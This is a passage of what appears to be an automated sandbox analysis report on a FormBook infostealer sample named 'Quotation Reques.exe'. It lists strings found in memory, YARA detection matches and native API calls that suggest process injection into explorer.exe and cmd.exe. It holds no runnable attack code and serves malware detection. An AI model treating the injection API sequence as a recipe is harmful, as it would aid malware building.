          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmp, String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://static.loopia.se/responsive/images/extra_pages/website.svg
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://static.loopia.se/responsive/images/footer/logo-grey.png
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmp, String found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
          Source: cmd.exe, 00000010.00000002.497244966.00000000036D2000.00000004.00000001.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
          Source: Quotation Reques.exe, 00000000.00000002.250833656.0000000000779000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large strings
          Source: Quotation Reques.exe, LogIn.csLong String: Length: 13656
          Source: ftkqUsB.exe.0.dr, LogIn.csLong String: Length: 13656
          Source: 0.2.Quotation Reques.exe.90000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 0.0.Quotation Reques.exe.90000.0.unpack, LogIn.csLong String: Length: 13656
          Source: 6.2.Quotation Reques.exe.660000.1.unpack, LogIn.csLong String: Length: 13656
          Source: 6.0.Quotation Reques.exe.660000.0.unpack, LogIn.csLong String: Length: 13656
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: Quotation Reques.exe
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004181CA NtCreateFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004182FA NtClose,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004183AC NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041842A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011BA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011B96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003884BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003858A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B4F8 NtQueryInformationToken,NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B4C0 NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003AB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A9AB4 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003883F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FFAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_02FF9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00396550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0039374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_00A1C2B0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_00A19990
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B30040
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32EB8
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32EA7
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32C68
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B32C58
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B30D88
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 0_2_06B3FA20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041B862
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041C864
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_004012FB
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041BB26
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00408C6B
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00408C70
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CC1E
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CE55
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0041CFEB
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0117F900
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242D07
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01170D20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01194120
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01241D55
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2581
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118D5E0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012425DD
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118841F
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01231002
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123D466
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0118B090
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012420A8
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A20A0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012428EC
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242B28
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011AEBB0
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01241FF1
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_0123DBD2
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01196E30
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_012422AE
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_01242EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038D803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038E040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00389CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003848E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00391969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00396550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00387190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038FA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00385226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00385E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00388AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038CB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00395FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_03082B28
